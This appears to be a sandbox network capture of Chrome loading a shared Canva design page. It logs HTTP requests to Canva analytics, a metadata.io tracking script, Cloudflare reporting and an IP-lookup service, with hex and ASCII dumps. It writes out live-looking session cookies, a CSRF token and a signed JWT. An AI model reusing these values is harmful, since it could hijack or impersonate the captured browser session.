                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:34 UTC528OUTGET /site-insights.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: cdn.metadata.io
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:34 UTC765INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                    Content-Length: 6785
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Last-Modified: Wed, 19 Jun 2024 15:02:09 GMT
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: GL5Tx2BZR8maW_iFgMB1W5mptWqV16dc
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Server: AmazonS3
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 06:08:28 GMT
                                                                                                                                                                                                                                                    ETag: "9c747cf07b2623fe6f77e47f5a134103"
                                                                                                                                                                                                                                                    X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                    Via: 1.1 5f105c8a45513ef6d6473ba144b8b9a6.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                    X-Amz-Cf-Pop: TLV50-C1
                                                                                                                                                                                                                                                    X-Amz-Cf-Id: YjR4IZaI8WD-pxyDCqk_afrX2mt79rybR1I6ZaaJ_VulNSmn5MLQ1w==
                                                                                                                                                                                                                                                    Age: 55147
                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                    2024-12-19 21:27:34 UTC6785INData Raw: 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 2f 2a 2a 0a 20 20 20 2a 20 40 74 79 70 65 20 7b 73 74 72 69 6e 67 7d 20 4b 65 79 20 66 6f 72 20 74 68 65 20 76 69 73 69 74 6f 72 20 49 44 20 63 6f 6f 6b 69 65 2e 0a 20 20 20 2a 2f 0a 20 20 63 6f 6e 73 74 20 76 69 73 69 74 6f 72 49 64 4b 65 79 20 3d 20 22 4d 65 74 61 64 61 74 61 5f 76 69 73 69 74 6f 72 5f 69 64 22 3b 0a 0a 20 20 2f 2a 2a 0a 20 20 20 2a 20 40 74 79 70 65 20 7b 73 74 72 69 6e 67 7d 20 4b 65 79 20 66 6f 72 20 74 68 65 20 73 65 73 73 69 6f 6e 20 49 44 20 63 6f 6f 6b 69 65 2e 0a 20 20 20 2a 2f 0a 20 20 63 6f 6e 73 74 20 73 65 73 73 69 6f 6e 49 64 4b 65 79 20 3d 20 22 4d 65 74 61 64 61 74 61 5f 73 65 73 73 69 6f 6e 5f 69 64 22 3b 0a 0a 20 20 2f 2a 2a 0a 20 20 20 2a 20 40 74 79 70 65 20 7b 73 74
                                                                                                                                                                                                                                                    Data Ascii: (function () { /** * @type {string} Key for the visitor ID cookie. */ const visitorIdKey = "Metadata_visitor_id"; /** * @type {string} Key for the session ID cookie. */ const sessionIdKey = "Metadata_session_id"; /** * @type {st


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    57192.168.2.44980835.190.80.1443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:35 UTC540OUTOPTIONS /report/v4?s=wtrBfESVEFAq%2B65qJt%2FYKkNSSmQxg%2BzaZafd42Q1cdF4cyuk8%2FR99psrvgu7%2BTkEFT4vM%2FF8pfIC4sEcHWto21Ij2nm%2BektuMkK8V0GzRyavCzfXsBh2PVG30v6p%2Byo%3D HTTP/1.1
                                                                                                                                                                                                                                                    Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                    Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:35 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                    access-control-max-age: 86400
                                                                                                                                                                                                                                                    access-control-allow-methods: OPTIONS, POST
                                                                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                                                                    access-control-allow-headers: content-type, content-length
                                                                                                                                                                                                                                                    date: Thu, 19 Dec 2024 21:27:34 GMT
                                                                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    58192.168.2.449809104.16.103.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:35 UTC2863OUTPOST /_ajax/ae/createBatch HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    Content-Length: 1551
                                                                                                                                                                                                                                                    X-Canva-Brand: BAAAAAAAAAA
                                                                                                                                                                                                                                                    X-Canva-App: responsive_design_viewer
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    X-Canva-Build-Sha: e404dd6
                                                                                                                                                                                                                                                    X-Csrf-Token: Yzy1uD0I9GT_B9ypZbbQGK0r5qOlIcQ_PeqpudldO8IdMaoCmBoSvbrl3Hh6B9GL1gyOOuPINaA6kk4fV9uPuktO7bs
                                                                                                                                                                                                                                                    X-Canva-User: UAAAAAAAAAA
                                                                                                                                                                                                                                                    X-Canva-Analytics: AAQAA1dFQgAA
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Content-Type: application/json;charset=UTF-8
                                                                                                                                                                                                                                                    X-Canva-Request: recordanalyticseventbatch
                                                                                                                                                                                                                                                    sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                    X-Canva-Locale: en
                                                                                                                                                                                                                                                    X-Canva-Build-Name: 20241217-21
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4a
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGZxEJ [TRUNCATED]
                                                                                                                                                                                                                                                    2024-12-19 21:27:35 UTC1551OUTData Raw: 7b 22 41 22 3a 5b 7b 22 41 3f 22 3a 22 44 22 2c 22 41 22 3a 7b 22 41 22 3a 22 39 34 66 62 34 38 32 65 2d 39 34 33 63 2d 34 39 37 39 2d 61 64 64 61 2d 39 33 38 64 66 32 64 62 38 63 61 32 22 2c 22 45 22 3a 22 32 30 32 34 2d 31 32 2d 31 39 54 32 31 3a 32 37 3a 32 35 2e 33 33 31 5a 22 2c 22 46 22 3a 22 32 30 32 34 2d 31 32 2d 31 39 54 32 31 3a 32 37 3a 33 33 2e 30 39 32 5a 22 2c 22 48 22 3a 22 65 6e 22 2c 22 49 22 3a 7b 22 41 22 3a 22 55 53 22 7d 2c 22 4a 22 3a 22 57 45 42 22 2c 22 4b 22 3a 7b 22 41 41 54 53 4f 22 3a 22 41 31 22 2c 22 57 4b 44 55 49 22 3a 22 41 22 2c 22 56 53 45 4d 4c 22 3a 22 43 22 2c 22 54 53 51 52 4c 22 3a 22 42 22 2c 22 54 4f 4d 4c 4f 22 3a 22 41 22 2c 22 53 45 4f 50 53 22 3a 22 43 22 2c 22 52 52 53 4e 43 22 3a 22 41 22 2c 22 52 52 53 43
                                                                                                                                                                                                                                                    Data Ascii: {"A":[{"A?":"D","A":{"A":"94fb482e-943c-4979-adda-938df2db8ca2","E":"2024-12-19T21:27:25.331Z","F":"2024-12-19T21:27:33.092Z","H":"en","I":{"A":"US"},"J":"WEB","K":{"AATSO":"A1","WKDUI":"A","VSEML":"C","TSQRL":"B","TOMLO":"A","SEOPS":"C","RRSNC":"A","RRSC
                                                                                                                                                                                                                                                    2024-12-19 21:27:35 UTC1061INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:35 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=utf-8
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a3deaa3f795-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors 'self' https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                    x-frame-options: sameorigin
                                                                                                                                                                                                                                                    x-request-id: 8f4a7a3deaa3f795
                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9dwhallwTIiIwV19hL5eZHrFgoOoZLdXkjo%2FvpnoAuqs1VO%2FrkxaXiM5IKIF9ZI6RyzegZFWJZOvC0FMvbRgkGJOpQiRxZdB5SuFv2HHf0TReNNJl2iMuOz6IeDCqPg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    2024-12-19 21:27:35 UTC28INData Raw: 31 36 0d 0a 27 22 5d 29 7d 77 68 69 6c 65 28 31 29 3b 3c 2f 78 3e 2f 2f 7b 7d 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 16'"])}while(1);</x>//{}
                                                                                                                                                                                                                                                    2024-12-19 21:27:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    59192.168.2.449813172.67.74.152443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:36 UTC549OUTGET /?format=json HTTP/1.1
                                                                                                                                                                                                                                                    Host: api.ipify.org
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:36 UTC463INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:36 GMT
                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                    Content-Length: 21
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8f4a7a451eb28c90-EWR
                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1977&min_rtt=1970&rtt_var=754&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=1127&delivery_rate=1437007&cwnd=201&unsent_bytes=0&cid=8f0dbb6443452475&ts=484&x=0"
                                                                                                                                                                                                                                                    2024-12-19 21:27:36 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                                                                                    Data Ascii: {"ip":"8.46.123.189"}


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    60192.168.2.44981113.226.2.3443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:36 UTC561OUTGET /pixel/config/1721.json HTTP/1.1
                                                                                                                                                                                                                                                    Host: cdn.metadata.io
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:36 UTC811INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                    Content-Length: 354
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 02:58:15 GMT
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET
                                                                                                                                                                                                                                                    Last-Modified: Mon, 22 Jul 2024 02:40:56 GMT
                                                                                                                                                                                                                                                    ETag: "b4f9f0dd587c5abe6708f44a6e11a53f"
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: M9mCnq1eLFymQr3gKnRqRiqpIYrp9XbS
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Server: AmazonS3
                                                                                                                                                                                                                                                    X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                    Via: 1.1 e9ece8a38ce6bb2b68b3b5a87615cfee.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                    X-Amz-Cf-Pop: TLV50-C1
                                                                                                                                                                                                                                                    X-Amz-Cf-Id: RZaOOy6mXLeaHDsFQM3t11doAx6u1n2wNJtoSES89LRs-ak6z4lS7g==
                                                                                                                                                                                                                                                    Age: 66562
                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                    2024-12-19 21:27:36 UTC354INData Raw: 7b 22 70 69 78 65 6c 4a 77 74 22 3a 20 22 65 79 4a 30 65 58 41 69 4f 69 4a 4b 56 31 51 69 4c 43 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 4a 39 2e 65 79 4a 7a 64 57 49 69 4f 69 4a 77 61 58 68 6c 62 43 42 6a 62 32 35 6d 61 57 63 69 4c 43 4a 75 59 57 31 6c 49 6a 6f 69 51 32 46 75 64 6d 45 67 53 57 35 6a 4c 69 49 73 49 6d 6c 7a 63 79 49 36 49 6d 31 6c 64 47 46 6b 59 58 52 68 49 47 6c 75 59 79 34 69 4c 43 4a 68 64 57 51 69 4f 69 49 78 4e 7a 49 78 49 69 77 69 5a 58 68 77 49 6a 6f 78 4e 7a 59 33 4d 54 45 35 4e 44 41 77 4c 43 4a 70 59 58 51 69 4f 6a 45 33 4d 6a 45 78 4d 7a 63 78 4d 44 59 73 49 6d 35 69 5a 69 49 36 4d 54 63 78 4f 54 63 33 4d 6a 49 77 4d 43 77 69 59 32 39 73 62 47 56 6a 64 45 6c 75 63 32 6c 6e 61 48 52 7a 49 6a 6f 77 4c 43 4a 77 59 57 4e 72
                                                                                                                                                                                                                                                    Data Ascii: {"pixelJwt": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJwaXhlbCBjb25maWciLCJuYW1lIjoiQ2FudmEgSW5jLiIsImlzcyI6Im1ldGFkYXRhIGluYy4iLCJhdWQiOiIxNzIxIiwiZXhwIjoxNzY3MTE5NDAwLCJpYXQiOjE3MjExMzcxMDYsIm5iZiI6MTcxOTc3MjIwMCwiY29sbGVjdEluc2lnaHRzIjowLCJwYWNr


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    61192.168.2.44981213.226.2.3443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:36 UTC355OUTGET /site-insights.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: cdn.metadata.io
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:37 UTC765INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                    Content-Length: 6785
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Last-Modified: Wed, 19 Jun 2024 15:02:09 GMT
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: GL5Tx2BZR8maW_iFgMB1W5mptWqV16dc
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Server: AmazonS3
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 06:08:28 GMT
                                                                                                                                                                                                                                                    ETag: "9c747cf07b2623fe6f77e47f5a134103"
                                                                                                                                                                                                                                                    X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                    Via: 1.1 b64967530af1eaf55ba68a4d7e642cee.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                    X-Amz-Cf-Pop: TLV50-C1
                                                                                                                                                                                                                                                    X-Amz-Cf-Id: Qjw6pMEQYEy42nkdO3cbEamqQSV7FXcmbPSLuvizZOSIOeSZx67R-g==
                                                                                                                                                                                                                                                    Age: 55149
                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                    2024-12-19 21:27:37 UTC6396INData Raw: 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 2f 2a 2a 0a 20 20 20 2a 20 40 74 79 70 65 20 7b 73 74 72 69 6e 67 7d 20 4b 65 79 20 66 6f 72 20 74 68 65 20 76 69 73 69 74 6f 72 20 49 44 20 63 6f 6f 6b 69 65 2e 0a 20 20 20 2a 2f 0a 20 20 63 6f 6e 73 74 20 76 69 73 69 74 6f 72 49 64 4b 65 79 20 3d 20 22 4d 65 74 61 64 61 74 61 5f 76 69 73 69 74 6f 72 5f 69 64 22 3b 0a 0a 20 20 2f 2a 2a 0a 20 20 20 2a 20 40 74 79 70 65 20 7b 73 74 72 69 6e 67 7d 20 4b 65 79 20 66 6f 72 20 74 68 65 20 73 65 73 73 69 6f 6e 20 49 44 20 63 6f 6f 6b 69 65 2e 0a 20 20 20 2a 2f 0a 20 20 63 6f 6e 73 74 20 73 65 73 73 69 6f 6e 49 64 4b 65 79 20 3d 20 22 4d 65 74 61 64 61 74 61 5f 73 65 73 73 69 6f 6e 5f 69 64 22 3b 0a 0a 20 20 2f 2a 2a 0a 20 20 20 2a 20 40 74 79 70 65 20 7b 73 74
                                                                                                                                                                                                                                                    Data Ascii: (function () { /** * @type {string} Key for the visitor ID cookie. */ const visitorIdKey = "Metadata_visitor_id"; /** * @type {string} Key for the session ID cookie. */ const sessionIdKey = "Metadata_session_id"; /** * @type {st
                                                                                                                                                                                                                                                    2024-12-19 21:27:37 UTC389INData Raw: 74 20 3d 20 28 6f 70 74 69 6f 6e 73 29 20 3d 3e 20 7b 0a 20 20 20 20 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 6f 70 74 73 2c 20 6f 70 74 69 6f 6e 73 29 3b 0a 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 63 72 6f 6c 6c 22 2c 20 74 68 72 6f 74 74 6c 65 28 70 72 6f 6c 6f 6e 67 53 65 73 73 69 6f 6e 2c 20 31 30 30 30 29 29 3b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 20 74 68 72 6f 74 74 6c 65 28 70 72 6f 6c 6f 6e 67 53 65 73 73 69 6f 6e 2c 20 31 30 30 30 29 29 3b 0a 0a 20 20 20 20 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 5b 72 65 73 6f 6c 76 65 49 70 28 29 2c 20 72 65 73 6f 6c 76 65 43 6f 6e 66 69 67 28 29 5d 29 2e 66 69 6e 61 6c 6c 79 28 28 29 20
                                                                                                                                                                                                                                                    Data Ascii: t = (options) => { Object.assign(opts, options); window.addEventListener("scroll", throttle(prolongSession, 1000)); window.addEventListener("click", throttle(prolongSession, 1000)); Promise.all([resolveIp(), resolveConfig()]).finally(()


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    62192.168.2.44981435.190.80.1443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:36 UTC484OUTPOST /report/v4?s=wtrBfESVEFAq%2B65qJt%2FYKkNSSmQxg%2BzaZafd42Q1cdF4cyuk8%2FR99psrvgu7%2BTkEFT4vM%2FF8pfIC4sEcHWto21Ij2nm%2BektuMkK8V0GzRyavCzfXsBh2PVG30v6p%2Byo%3D HTTP/1.1
                                                                                                                                                                                                                                                    Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    Content-Length: 405
                                                                                                                                                                                                                                                    Content-Type: application/reports+json
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
